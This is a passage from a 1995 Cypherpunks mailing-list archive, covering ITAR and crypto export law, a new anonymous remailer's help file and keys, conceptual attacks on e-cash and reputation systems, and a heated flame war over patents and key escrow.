made that Jim Bizdos was Greek and not a > U.S. citizen. Is this statement in the same class as an Elvis > sighting? Or if it is true, what impact would ITAR have on foreign > nationals working for a US company involved with export restricted crypto? Yes, its true. Its meaningless because he's a U.S. Person, and thats all that counts for the ITARs. .pm From perry at piermont.com Sun Sep 10 10:47:35 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 10 Sep 95 10:47:35 PDT Subject: not a flame please read and think about this In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl> Message-ID: <199509101747.NAA11327@frankenstein.piermont.com> Anonymous writes: > i know this is unpopular but i wish someone would respond the the points > rather than flaming me. I'm afraid that you're basically an anonymous jerk and that I personally have no interest in responding to you. Post under your own name if you want more than bile. .pm From dcl at panix.com Sun Sep 10 12:08:56 1995 From: dcl at panix.com (David C. Lambert) Date: Sun, 10 Sep 95 12:08:56 PDT Subject: Precipice remailer open for business Message-ID: <199509101908.PAA26842@panix.com> The Precipice Remailer is now open for business! Below, I have included the remailer-help file. You can get this file by sending a message to: mixmaster at mix.precipice.com with a subject of "remailer-help". - David C. Lambert dcl at panix.com dcl at mix.precipice.com ================================================================================ This remailer supports both type II (Mixmaster) and type I (Ghio) cypherpunks messages. Help files for both are below. Both mailers have a 5 message reordering pool, with zero default latency. Posting to Usenet is not supported. I consider the following to be inappropriate use of this anonymous remailer, and will take steps to prevent anyone from doing any of the following: - Sending messages intended primarily to be harassing or annoying (this includes spam/velveeta); - Use of the remailer for any illegal purpose (death threats, kiddie porn, etc). Don't ruin this remailer for everyone by doing something stupid and/or illegal, and I won't be forced to assist the authorities in crushing you like an insect. If you don't want to receive anonymous mail, send me a message, and I will add your email address to the block list. You can get a list of statistics on remailer usage by sending mail to mixmaster at mix.precipice.com with Subject: remailer-stats Have a nice day. - David C. Lambert dcl at mix.precipice.com The type I PGP key is: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAypWYAAAEEAMUFk7ue4Isn2u1FMtYhJBLbSmxSgUaBgs8EJNZZYExcfTCr V+m8o2N3pYxzbjPRAZ/pv0N1Tg93Kh17/RSzEjR/y91aaBjePv36VYKwCS8KeeX+ 4LDyboic5EVkiDt1eu2cI6LIrl9w7Fo1/3YzNvsMVJ1ki/v5Ie5wAysW17oJAAUR tBttaXhtYXN0ZXJAbWl4LnByZWNpcGljZS5jb20= =hVLK -----END PGP PUBLIC KEY BLOCK----- The Mixmaster key is: precipice mixmaster at mix.precipice.com 05fef5887ac55dfe7379d0ef4a2a0c4b 2.0.1 -----Begin Mix Key----- 05fef5887ac55dfe7379d0ef4a2a0c4b 258 AATIdI/+dQ3rsvREcdYsnJkd+zQKCkPerZsyDXmX NaYjUTwMhiHHjl/e7Zqx/mUAUQnifQfg4KpHvBGL a6rQUTQjRhhz8sOvynyJci4NTm8DFDjYdTpvnbjp YPu7xNhSfg7fmqXuqCan1M/AmpU1r6sF6M6gA0W4 EpOqFaJo7g32xQAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB -----End Mix Key----- ============================== TYPE II INFO (Mixmaster 2.0.1) ============================== This is a Mixmaster remailer. It provides an extremely high level of security. To use it, you must have a client program to produce the messages. This software is available from ftp://nately.ucsd.edu/pub/remail Read the README file for instructions. This file is export restricted, so it can not be retrieved directly. Some information can be sent to you by the remailer by including the following commands (one per message) in the subject line of mail to the remailer. remailer-help This file. remailer-stats Usage statistics for the last 24 hours. remailer-key The mixmaster key file for this remailer. A list of remailers is available from ftp://nately.ucsd.edu/pub/remail, http://nately.ucsd.edu/~loki/, and will be posted periodically to alt.privacy.anon-server and other privacy related groups. ====================== TYPE 1 INFO (Ghio 2.0) ====================== I have an automated mail handling program installed here which will take any message with the proper headers and automatically re-send it anonymously. You can use this by sending a message to mixmaster at mix.precipice.com, with the header Anon-To: containing the address that you want to send anonymously to. (Only one recipient address is permitted.) If you can't add headers to your mail, you can place two colons on the first line of your message, followed by the Anon-To line. Follow that with a blank line, and then begin your message. For Example: > From: joe at site.com > To: mixmaster at mix.precipice.com > Subject: Anonymous Mail > > :: > Anon-To: beth at univ.edu > > This is some anonymous mail. The above would be delivered to beth at univ.edu anonymously. All headers in the original message are removed, with the exception of the Subject (and Content-Type, if present). She would not know that it came from Joe, nor would she be able to reply to the message. However, if Beth suspected that Joe had sent the message, she could compare the time that the message was received with the times that Joe was logged in. However, this problem can be avoided by instructing the remailer to delay the message, by using the Latent-Time header: > From: joe at site.com > To: mixmaster at mix.precipice.com > Subject: Anonymous Mail > > :: > Anon-To: beth at univ.edu > Latent-Time: +1:00 > > This is some anonymous mail. The above message would be delayed one hour from when it is sent. It is also possible to create a random delay by adding an r to the time (ie +1:00r), which would have the message be delivered at a random time, but not more than an hour. Another problem is that some mailers automatically insert a signature file. Of course, this usually contains the senders email address, and so would reveal their identity. The remailer software can be instructed to remove a signature file with the header "Cutmarks". Any line beginning with the same text at in the cutmarks header, and any lines following it will be removed. > From: sender at origin.com > To: mixmaster at mix.precipice.com > Subject: Anonymous Mail > > :: > Anon-To: recipient at destination.com > Cutmarks: -- > > This line of text will be in the anonymous message. > -- > This line of text will not be in the anonymous message. You can add additional headers to the output message by preceeding them with ## > From: chris at nifty.org > To: mixmaster at mix.precipice.com > Subject: Nifty Anon Msg > > :: > Anon-To: andrew at hell.edu > > ## > Reply-To: acs-314159 at chop.ucsd.edu > > A Message with a reply address. By separating messages with cutmarks, you can send more than one message at once: > From: me at mysite > To: mixmaster at mix.precipice.com > Subject: message 1 > > :: > Anon-To: recipient1 at site1.org > Cutmarks: -- > > Message one. > -- > :: > Anon-To: recipient2 at site2.org > > ## > Subject: message 2 > > Message two. The two messages will be delivered separately. For added security, you can encrypt your messages to the remailer with PGP. The remailer software will decrypt the message and send it on. Here is the remailer's public key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAypWYAAAEEAMUFk7ue4Isn2u1FMtYhJBLbSmxSgUaBgs8EJNZZYExcfTCr V+m8o2N3pYxzbjPRAZ/pv0N1Tg93Kh17/RSzEjR/y91aaBjePv36VYKwCS8KeeX+ 4LDyboic5EVkiDt1eu2cI6LIrl9w7Fo1/3YzNvsMVJ1ki/v5Ie5wAysW17oJAAUR tBttaXhtYXN0ZXJAbWl4LnByZWNpcGljZS5jb20= =hVLK -----END PGP PUBLIC KEY BLOCK----- To utilize this feature, create a message with two colons on the first line, then the Anon-To line, then any other headers, such as cutmarks or latency, then a blank line, and then the message. Encrypt this with the remailer's public key. Then send it to the remailer, adding the header "Encrypted: PGP". If you forget this, the remailer won't know that it needs to be decrypted. Also be sure to use the -t option with PGP, or the linefeeds might not be handled properly. > To: mixmaster at mix.precipice.com > From: me at mysite.org > > :: > Encrypted: PGP > > -----BEGIN PGP MESSAGE----- > Version: 2.6.2 > > hIkCuMeAjnwmCTUBA+dfWcFk/fLRpm4ZM7A23iONxkOGDL6D0FyRi/r0P8+pH2gf > HAi4+1BHUhXDCW2LfLfay5JwHBNMtcdbgXiQVXIm0cHM0zgf9hBroIM9W+B2Z07i > 6UN3BDhiTSJBCTZUGQ7DrkltbgoyRhNTgrzQRR8FSQQXSo/cf4po0vCezKYAAABP > smG6rgPhdtWlynKSZR6Gd2W3S/5pa+Qd+OD2nN1TWepINgjXVHrCt0kLOY6nVFNQ > U7lPLDihXw/+PPJclxwvUeCSygmP+peB1lPrhSiAVA== > =da+F > -----END PGP MESSAGE----- Any unencrypted text after the PGP message is also remailed. This is to allow sending to someone who is anonymous. If you create a PGP-encrypted message to yourself via my remailer, and then you give it to someone, they can send you a message by sending the encrypted message to the remailer. The remailer will then decrypt it and send it to you. The message gets anonymized in the process, so the sender will need to include a return address if he wants a reply. Messages sent this way can be encrypted using the Encrypt-Key: feature. Any text following a line beginning with ** will be encrypted with this key. For example, if you put in your PGP message: > :: > Anon-To: you at yourhost.org > Encrypt-Key: your_password > > ** The appended message after the ** will be encrypted with the key "your_password", using PGP's conventional encryption option. From hfinney at shell.portal.com Sun Sep 10 12:13:27 1995 From: hfinney at shell.portal.com (Hal) Date: Sun, 10 Sep 95 12:13:27 PDT Subject: Brand e-cash implementation? Message-ID: <199509101912.MAA07700@jobe.shell.portal.com> Brands has a web page at . I don't know of any implementations of his technology. The last time I heard from him was early this year and at that time he apparently was still looking for backers. BTW he has a new paper out as of July 95, available above, which discusses some problems and attacks on some earlier papers. He had proposed a notion called "secret key certificates" in which some problems have been found. Basically a secret key certificate is just like a public key certificate (a signature by someone on a public key as in PGP) except that realistic-looking but ultimately worthless secret key certificates can be faked up (simulated) by anyone. No one can distinguish a fake secret key certificate from a real one. However, they are worthless because the faking process requires you to choose a random public key, and you can't figure out what the secret key is. Brands has (re)expressed his digital cash technology in terms of these secret key certificates. But Berry Schoenmakers of CWI has shown a way in which a faked-up secret key certificate can be used to spend a coin which was never withdrawn. However, to do so, you have to go through the withdrawal protocol in a particular incorrect way. You force the bank to act as an "oracle" for a certain discrete log problem when you do the withdrawal. The data you get from the incorrect withdrawal protocol allows you to spend the fake coin. So this is not actually a dangerous attack, because you in effect have to withdraw a coin in order to spend the fake one. You can't make any money from it. Still it was not anticipated and that is a bit worrisome. I'm not sure why Brands' various proofs of correctness (which are one of the big selling points of his technology) did not anticipate this attack. (In effect this is a different form of a blind signature than what Brands planned for, since you withdraw one thing and get another. I was thinking Brands should write this up under the title "Unanticipated Blinding for Signatures", a pun on Chaum's "Blinding for Unanticipated Signatures", one of his credential papers.) Brands has a workaround to prevent this attack, but it hurts the provability of his scheme. "A rigorous prove [sic] of the effectiveness of the measure may be hard to provide, though, since one must hereto prove that the CA cannot be used as an oracle to perform the cryptographic action in the showing protocol with respect to simulated public keys." So this may be a setback in Brands' attempts to get his thesis finished and accepted. As for the question of whether any digital cash scheme offers "true" anonymity, I think you have to be more specific. Virtually all cash advocates will claim that they can offer this. In the debate I had earlier with Lucky Green I argued that Chaum's ecash does offer a certain kind of anonymity. The extent to which it does not is largely not technical but a product of not allowing anonymous bank accounts. With anonymous accounts Chaum's technology offers as much anonymity as any system that I have studied. There is one technical problem with Chaum's ecash which Lucky mentioned, but I believe it applies to all systems. That is that the spender of the cash can "mark" it or at least recognize it when it is later deposited. If the spender wanted to attack the receiver of the money and it is deposited non-anonymously then this will be a problem. However, as we discussed here several months ago, Chaum's paper "Transferred Cash Grows in Size" from a recent Crypto proceedings shows that by colluding with the bank a payor of cash can recognize it at any later stage of the payment chain. So this kind of anonymity is very hard to achieve. Chaum's paper applied to off-line cash, though, so perhaps an online system could do it. But you'd have to blind the coins twice, once when they pass from bank to payor and once when they go from payor to payee, and I don't see how to do this. Hal Finney From rmartin at aw.sgi.com Sun Sep 10 12:23:05 1995 From: rmartin at aw.sgi.com (Richard Martin) Date: Sun, 10 Sep 95 12:23:05 PDT Subject: not a flame please read and think about this In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl> Message-ID: <9509101521.ZM13875@glacius.alias.com> Hm. Time for agents. But here's a fairly simple test: if there are no uppercase letters in the body of the message, and no apostrophes either, it's likely from "anonymous", our favorite Thomas. After all, the other reputable nyms at least *sign* their stuff, don't they? [and PGP generally seems to use upper-case when it writes signatures] frodo =) -- Richard Martin Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team] rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu http://www.io.org/~samwise Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992 From Andrew.Spring at ping.be Sun Sep 10 13:10:58 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Sun, 10 Sep 95 13:10:58 PDT Subject: Bizdos citizenship? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bizdos was Greek and not a U.S. citizen. Is this statement in the same class as an Elvis sighting? Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto? > >Please don't get carried away and turn this into a Net rumor. I'm just curious if anyone on the list can confirm or deny the citizenship comment. Jim Bidzos is a US Permanent Resident Alien and Greek citizen. He has a Green Card. It doesn't have any ITAR impact, since the ITAR term 'Foreign Person' doesn't include Green Carded Resident Aliens. It probably wouldn't have any impact anyway, since he's a business weenie, and not a software weenie. Now, if he had a _programmer_ that wasn't a US Citizen, that would be a-whole-nother kettle of fish. He's previously stated that he would become a US Citizen, if it were not for the fact that Greece would require him to give up his Greek (and hence his EC) citizenship. See Simson Garfinkle's book on PGP for more details. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFMZFI4k1+54BopBAQGK7gP+Oq+FjqjCeQziC16Ryq64i1tXMAhV/jaX 86TBumss/GPpaVfLGtDS3FZARK9eTo4gVPTfABtvIa/u6QzZGL9zCT5z5nWT5QJ4 Koj5jnGsnNpXx3YGa1bJfZOI4ctkRovPWpyPa4jWOEooJz5UbvCCwGW/YoYMlvCs sQ//Qs7uDPs= =ARLj -----END PGP SIGNATURE----- From damion.furi at the-matrix.com Sun Sep 10 13:11:24 1995 From: damion.furi at the-matrix.com (DAMION FURI) Date: Sun, 10 Sep 95 13:11:24 PDT Subject: not a flame please re In-Reply-To: <8B0D11D.000504E7BF.uuout@the-matrix.com> Message-ID: <8B0D375.000504E8F1.uuout@the-matrix.com> A|i know this is unpopular but i wish someone would respond the the points You're going out of your way to be an asshole and you're surprised that you're being attacked? If you don't want to be flamed, turn off the flamethrower, shut down the bulldozer, and use a reasonable tone. |rather than flaming me. pat farrel is the only one of you with the balz |to try to defend himself insead of attacking me. and you attack me for |being anon. i love it. cypherpunks yea right. Anonymous doesn't mean anything except that you don't have the "balz" to stand up for the beliefs you're espousing. A|wei dai patents algorithms - for microsoft!!!!. that should |fucking help us a lot. whos he gonna sue first? If the patents aren't valid, they won't stick. What are you bitching about? A|according to sci.crypt mat blaze can prove that clipper has no back |door. right. that sure helps us. david sternlights new hero. Maybe it doesn't. Not that it matters. The only reasonable working assumption for Clipper (or anything like it) is that it _does_ have at least one back door and that it will be abused. What's new about this? Again, what are you bitching about? Sternlight's an idiot, use your head. A|pat farrel signs up with the nsa to make the key escrow rules easier |for us morons to understand. hey thanks. maybe theyll give you a |nicer room in the concentration kamp. I'm not going to participate in an escrow no matter how easily the rules are understood. I'm not going to participate for any reason. But I can feel that way without jumping down Farrell's throat over it. After all, he's not my spokesman. A|a whole shitload of socalled cypherpunks jumping over each other to help and |defend him. That's not what I saw. I saw a whole shitload of cypherpunks jumping over each other attacking you, not defending him. A|bruce schneier is copyrighting crypt programs and |threatining to sue people who use it. So? His programs, his rules. If you used one of my programs without a license, I'd sue you, too. A|even phil zimmerman is selling the rights to pgp. what about all the people w | contributed code (like me). not a dime for us because phil is famous |and your not alowed to say anythingn bad about him. sorry i forgot phil is go |no one dares to complain. ask phil about me and when i asked about sharing |profits from the code i conrtibuted. also about the deal with |r.f... You weren't expecting money when you contributed code. What changed? A|lets get back to being punks. fuck these traitors. do crypto and fuck the nsa Random defiance won't get you anywhere you want to be. :----------:----------:----------:----------:----------:----------:----- : furi at the-matrix.com | pgp-public-key at demon.co.uk | LIVE LION ALERT : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0 F7 E9 67 1F AF B8 2D 94 PGP: When it's none of their damned business. --- � SPEED 2.00 #2640 � From nobody at REPLAY.COM Sun Sep 10 15:20:25 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 10 Sep 95 15:20:25 PDT Subject: Nice Guys Message-ID: <199509102220.AAA25494@utopia.hacktic.nl> NY Times, Sept. 10, 1995. The Decline of the Nice-Guy Quotient By Daniel Goleman Contrary to conventional wisdom, nice guys do finish first. The trouble is, nice guys are harder and harder to find. Amid the agonizing over standardized intelligence tests comes a new problem to worry about. Psychologists seeking a broader measure of intelligence, one that accounts for the personality traits that seem to predict success better than IQ alone, have discovered that a newly minted virtue they call "emotional intelligence" is declining as well. A recent study done at Bell Laboratories the high-tech think tank near Princeton N.J., found that the most valued and productive engineers -- at least among electrical engineers working in teams of up to 150 people -- were not those with the highest IQs, the highest academic credentials or the best scores on achievement tests. Instead, the stars were those whose congeniality put them at the heart of the informal communication networks that would spring up during times of crisis or innovation. When these likeable engineers hit a snag and E-mailed for help, they got an answer instantly; when others less gifted in interpersonal realms sent similar messages, they sometimes waited days or weeks for a reply. The standouts excelled in rapport, empathy, cooperation, persuasion and the ability to build consensus among people. The new term for these traits is emotional intelligence, which, in addition to the social graces, includes the ability to read one's own feelings, to control one's own impulses and anger, to calm oneself down and to maintain resolve and hope in the face of setbacks. To predict the success of a financial analyst or geophysicist, IQ is still crucial. But within a pool of high-lQ people, those with high emotional intelligence will have an extra competitive edge. Emotional intelligence, like self-knowledge and personal charisma, has long been seen as ineffable, more the stuff of poets and philosophers than psychometricians. And yet, despite all that, the measuring has begun. In the mid-1970s, and again in the late 1980s, Thomas Achenbach, a psychologist at the University of Vermont, had thousands of American children assessed by their parents and teachers on a behavioral checklist. He found that over the course of that decade and a half, America's children, on average, had become more anxious and depressed, more impulsive and mean, more demanding and disobedient, more hot-tempered and aggressive -- and not just in beleaguered urban neighborhoods. The study found growing emotional deficits even among the children of the wealthiest suburbs. Although the scores were worst for the poorest children, the rate of decline was the same for all, privileged and impoverished alike. Apparently, students continue to be receptive even into their teen years. Neuroscientists have found that the centers in the prefrontal lobes that control emotional impulse are among the last parts of the brain to reach full maturity, sometime in mid- to late adolescence. Now, at last, from the emotional literacy front there is some promising news: Children in the courses show marked improvements in the ability to control their impulses, show empathy, cooperate with others, manage anger and anxiety, focus on a task, pursue goals and resolve conflicts. Delinquency, fights and drug use drop. And there is an added bonus: achievement test scores rise too. ------ From weidai at eskimo.com Sun Sep 10 15:32:12 1995 From: weidai at eskimo.com (Wei Dai) Date: Sun, 10 Sep 95 15:32:12 PDT Subject: question about reputation Message-ID: In an economy based on positive reputations, how does one acquire a reputation capital? One way may be to initially perform services at a price below cost, but this has some problems. For example, Alice starts a anonymous consulting service, and announces that she will answer the first ten queries for free. Upon hearing this, Mallet immediately starts another consulting service, and announces the same offer. At this point Mallet can simply forward his customers' queries to Alice and Alice's answers back to his customers. Thus, he gains reputation at no cost. On the other hand, this "man-in-the-middle" attack can also work against conventional True Name based services, but perhaps with less effect. Has anyone ever heard of this being done? Is there a better way to acquire a good reputation? Wei Dai From aba at dcs.exeter.ac.uk Sun Sep 10 15:52:51 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Sun, 10 Sep 95 15:52:51 PDT Subject: not a flame please read and think about this Message-ID: <20619.9509102252@exe.dcs.exeter.ac.uk> Anon writes: > i know this is unpopular but i wish someone would respond the the > points rather than flaming me. Fair enough, try these... > wei dai patents algorithms - for microsoft!!!!. that should > fucking help us a lot. whos he gonna sue first? Shame it got patented, one more patent. Patents are a mess, ick! > hey i think ill patent xor!!!! and give the patent to the nsa!!! I was kind of wandering if it would be necessary to patent something just to ensure someone else did patent *your* idea, if you came up with one. Or can you publish, and then say that's prior art, so no one else can go patent your idea. Otherwise it would be kind of cool for cpunks to be holding a few patents themselves, allowing free use, just to stop some "hmm lets see what we can patent this week", and "lets patent their work cos they haven't yet" types stealing stuff, and disabling a whole section of work. Chaum's got lots of nice technology, but his patenting and $150k price tag might not be doing him favours. Unless he really does manage to pull some big banks or something. I reckon the netscape model is a good one, give stuff away to the educational lot, sell things cheap, have free demo versions, get the standard first before charging a ransom. Guess he knows what he's doing tho. I hope so for the sake of the future of anon ecash. Be a shame if some of these lame things which claim to be ecash but are really checks with full audit logs, or credit card transactions in disguise become the defacto standard. Problem is no one stands much of a chance unless a radically new method of ecash can be had, he has his patents cover blind sigs? I guess they don't cover blind sigs in general because Brands has applied for patents on his improved blinding techniques. > according to sci.crypt mat blaze can prove that clipper has no back > door. right. that sure helps us. david sternlights new hero. That interpretation was argued. But it's interesting anyway, if a MKCS is equivalent to a PK, and PKs are computationally expensive, and clipper chips are cheap, well hey maybe that's what it does mean, and they wouldn't want to have a weak backdoor in the sense of a weak algorithm, as it may come to light some day, similarly eventually the thing would surely get reverse-engineered, they wouldn't want to be caught out, I'd have thought. They don't need that for a backdoor, they've already got the front door - a copy of all the keys. > pat farrel signs up with the nsa to make the key escrow rules easier > for us morons to understand. hey thanks. maybe theyll give you a > nicer room in the concentration kamp. I found it real informative to have a first hand report of what was going on. I don't see anything wrong with going along to the meeting just to throw your spanner in the works, sounds like the govt types didn't have an easy time of it. They're clearly asking for things which are unacceptable to industry, and cpunks alike. A lot of the stuff Pat wrote up about the NIST meeting sounded like the majority of the attenders were trying to convert a government request for GAK into a CKE discussion. Would be a cool switch. > a whole shitload of socalled cypherpunks jumping over each other to > help and defend him. Well you did ask :-) > brian davis trys to convinice us that key escrow isnt so bad (who > signs your paycheck davie?????) Not sure that there was a motive attached (I could be wrong?), seemed like a provoking question to me. Got some interesting replies. > that guy from rand corp tells us words of wisdom from robert morris > the nsa guy as if we should write them down and pray three times a day > to them. I always kind of like to hear what ex-NSA types are reported as saying, it's quite fun because you never know if they are still on the payroll and feeding you a story for ulterior motives, or if they are making a statement which they think is to their advantage to scare you, or if they really are ex-NSA and are just saying what they can, being helpful, without getting in hot water with the secrecy stuff they have to agree to. > carl elison designs key escrow for tis and acts like hes one of us. Designs CKE, CKE is fine by me, it's voluntary, and just the software equivalent of having a spare key for your own use. GAK is the evil one. > bruce schneier is copyrighting crypt programs and > threatining to sue people who use it. Let's tackle one thing at a time ok? Lots of folks would agree patents are bad news, at least the state of them in the US with idiots patenting XORed cursors, etc. Clost to unanimous on GAK being evil incarnate. Copyrights, well GPL, ILF, RMS says programs should be free. Indeed long term copyrights look like endangered species, if crypto anarchy has it's say. But it's a tricky one because a lot of people make their money writing applications, and they don't want to vote themselves out of a job. If crypto anarchy long term proves copyrights to be outmoded, well the market will change. > even phil zimmerman is selling the rights to pgp. what about all the > people who contributed code (like me). not a dime for us because > phil is famous and your not alowed to say anythingn bad about > him. sorry i forgot phil is god. no one dares to complain. ask phil > about me and when i asked about sharing profits from the code i > conrtibuted. also about the deal with r.f... Wouldn't be much to go around if all the contributers got a share, there were lots of contributers. He's the one taking the rap anyway, and the guy who made it all possible. > lets get back to being punks. Cpunks write code, so lets do it! And lobby, and analyse govt polices, and educate about crypto, and attend govt run white-washes (NIST etc) to register their protest. > fuck these traitors Nah. Crypto anarchy and all that, it's an anarchy, you ain't going to find 2 cpunks with exact identical view points on all topics. Most of the people you complained of to my understanding have done a lot of work for the cpunk causes, as well as their implied copyright/patent crimes. > do crypto and fuck the nsa. Sounds cool to me. So whats the plan of action? People have different ideas, but they're all fighting for the same cause. Down with GAK, being the #1 target at the moment. Privacy from governments, scaling down of hugely bloated governments, malign cancerous growths that they are becoming these days, freedom is what it's all about. Adam From solman at MIT.EDU Sun Sep 10 15:57:18 1995 From: solman at MIT.EDU (solman at MIT.EDU) Date: Sun, 10 Sep 95 15:57:18 PDT Subject: question about reputation In-Reply-To: Message-ID: <9509102257.AA28992@ua.MIT.EDU> Wei wrote: |> In an economy based on positive reputations, how does one acquire a |> reputation capital? One way may be to initially perform services at a |> price below cost, but this has some problems. |> For example, Alice starts a anonymous consulting service, and announces |> that she will answer the first ten queries for free. Upon hearing this, |> Mallet immediately starts another consulting service, and announces the |> same offer. At this point Mallet can simply forward his customers' |> queries to Alice and Alice's answers back to his customers. Thus, he gains |> reputation at no cost. A) There is a real cost (some combination of reputation and other capital) involved in attracting customers. B) This is emphatically _not_ an "abuse" of reputation capital. Mallet will acquire a reputation based on the quality of the service he provides. Suppose that Bob also set up a service like Alice. Some people would go directly to Alice, some to Bob, and some to Mallet who chooses which ever of Alice and Bob offers the best deal for the customer. By choosing intelligently, Mallet could acquire a better reputation than either Alice or Bob. This would not be inaccurate. By using Mallet, (now a consulting services broker) the customers are geting a better deal. (i.e. MAX(A(x),B(x)) is greater than or equal to both A(x) and B(x)). JWS From rsalz at osf.org Sun Sep 10 16:04:04 1995 From: rsalz at osf.org (Rich Salz) Date: Sun, 10 Sep 95 16:04:04 PDT Subject: not a flame please read and think about this Message-ID: <9509102303.AA13613@sulphur.osf.org> >I was kind of wandering if it would be necessary to patent something >just to ensure someone else did patent *your* idea, if you came up >with one. Nope. >Or can you publish, and then say that's prior art, so no one else can >go patent your idea. This works. IBM used to have publish a monthly journal (I forget the name, it came out of one of their Yorktown labs) that did exactly this kind of thing for exactly this kind of reason. ACtually, they wrote about stuff that they thought was 5-10 years away. >> even phil zimmerman is selling the rights to pgp. what about all the >> people who contributed code (like me) ... . ask phil >> about me and when i asked about sharing profits from the code i >> conrtibuted. also about the deal with r.f... Mr/Ms. Anonymous is lying. His/her name appears nowhere in the credits, and his/her code appears nowhere in any PGP release. Don't waste any neurons on it. /r$ From adam at bwh.harvard.edu Sun Sep 10 16:10:30 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sun, 10 Sep 95 16:10:30 PDT Subject: question about reputation In-Reply-To: Message-ID: <199509102310.TAA00342@bwh.harvard.edu> Good question, but a quick modification allows for effective bootstrapping. If I want to start consulting for Amalgameted Consolodated, I can offer them a 10 free questions deal to bootstrap things with. Mallet can only cheat if my offer was broadcast. (I presume that Amalagated' keys are somehow strongly verified, and the negotiantions are kept secret from Eve and Mallet.) There might also be fingerprinting technologies that allow me to embed a signature in the documents returned to clients that would allow me to show that Mallet stole them. (Which might, incidentally, get Mallet a job in some circles...If thats known, Bob and Alice can collude to make it appear that Bob was Mallet, and thus forge a reputation. Wei wrote: | In an economy based on positive reputations, how does one acquire a | reputation capital? One way may be to initially perform services at a | price below cost, but this has some problems. | | For example, Alice starts a anonymous consulting service, and announces | that she will answer the first ten queries for free. Upon hearing this, | Mallet immediately starts another consulting service, and announces the | same offer. At this point Mallet can simply forward his customers' | queries to Alice and Alice's answers back to his customers. Thus, he gains | reputation at no cost. | | On the other hand, this "man-in-the-middle" attack can also work against | conventional True Name based services, but perhaps with less effect. Has | anyone ever heard of this being done? | | Is there a better way to acquire a good reputation? | | Wei Dai | -- "It is seldom that liberty of any kind is lost all at once." -Hume From dneal at usis.com Sun Sep 10 16:47:01 1995 From: dneal at usis.com (David Neal) Date: Sun, 10 Sep 95 16:47:01 PDT Subject: Senate Bill 974? Message-ID: Haven't seen it discussed here, but the August 28, 1995 issue of Lan Times covers Sen. Charles Grassley's (R-IOWA) Senate Bill 974. Frankly, you should probably read the text of the bill itself, because the article doesn't seem to get the facts straight. The article asserts first that the bill may outlaw any non-GAK encryption, but then quotes the senator as saying ``All my bill does is say you can't use computers to steal, to threaten others or conceal criminal conduct.'' Perhaps concealing criminal conduct is considered using non-GAK. The quote from the bill itself reads like the ITAR; it is illegal to ``distribute computer software that encodes or ecrypts electronic or digital communications to computer networks that the person knows, or reasonably should know, is accessible to foreign nationals and foreign governments, regardless of whether such software has been designated as nonexportable." The article also says that up to 64 bit keys may now be allowed in exportable software, but that ``some experts'' suggest that those keys may have to be GAK. I've never heard anything BUT the keys would have to GAK. David Neal - GNU Planet Aerospace 1-800-PLN-8-GNU Unix, Sybase and Networking consultant. "...you have a personal responsibility to be pro-active in the defense of your own civil liberties." - S. McCandlish From johnl at radix.net Sun Sep 10 17:06:34 1995 From: johnl at radix.net (John A. Limpert) Date: Sun, 10 Sep 95 17:06:34 PDT Subject: 64 bit crypto Message-ID: <01BA7FB7.8CF32E40@dialin36.annex1.radix.net> Couldn't we modify RC4 easily to provide the same security against brute-force attacks by just running the key-setup phase 65536 times instead of just once? Why would the attacker need to run the key setup 65536 times? From jya at pipeline.com Sun Sep 10 17:10:11 1995 From: jya at pipeline.com (John Young) Date: Sun, 10 Sep 95 17:10:11 PDT Subject: IP6_pi2 Message-ID: <199509110010.UAA29842@pipe2.nyc.pipeline.com> IEEE Spectrum, September, 1995: Excerpt on Net security from "Upgrading the Internet," a roundtable discussion of the Internet Society on the next generation of Internet protocols, IP Version 6. Discussants: Vinton Cerf, Stephen Deering, Christian Huitema, Haruhisa Ishida, Larry Landweber, Eric Schmidt, Lixia Zhang. A most important aspect of the IPv6 is the somewhat controversial decision to require that all v6 implementations support strong privacy and strong authentication. At this level, all of the security problems won't be solved, but we can authenticate and maintain privacy of packets that flow from one machine to another. This will eliminate many security threats in the current Internet, such as source-address-spoofing, source-related routing attacks, password sniffing, connection hijacking, and so on. New Scientist, Sept 9, 1995: "Watching you, watching us." Companies that sell electronic surveillance equipment to repressive regimes face the prospect of being "outed" on the Internet this autumn. Two electronic watchdogs, the British group Privacy International (PI) and its American sister organisation the Electronic Privacy Information Centre (EPIC), are setting up an offshore Internet site that will name companies that sell electronic instruments of repression to governments with poor records on human rights. IPI-pair: IP6_pi2 (13kb) From weidai at eskimo.com Sun Sep 10 17:20:39 1995 From: weidai at eskimo.com (Wei Dai) Date: Sun, 10 Sep 95 17:20:39 PDT Subject: question about reputation In-Reply-To: <199509102310.TAA00342@bwh.harvard.edu> Message-ID: On Sun, 10 Sep 1995, Adam Shostack wrote: > Good question, but a quick modification allows for effective > bootstrapping. If I want to start consulting for Amalgameted > Consolodated, I can offer them a 10 free questions deal to bootstrap > things with. Mallet can only cheat if my offer was broadcast. (I > presume that Amalagated' keys are somehow strongly verified, and the > negotiantions are kept secret from Eve and Mallet.) This scheme doesn't quite work. (Let's call Amalgameted Bob, to keep names short.) Bob can create a new, unlinkable pseudonym and give the same offer to Carol under the new pseudonym. Then, Bob acts as Mallet and passes messages back and forth between Alice and Carol. At the end of the 10 free questions, Bob terminates its contract with Alice, leaving Alice with nothing and Bob's pseudonym a certain 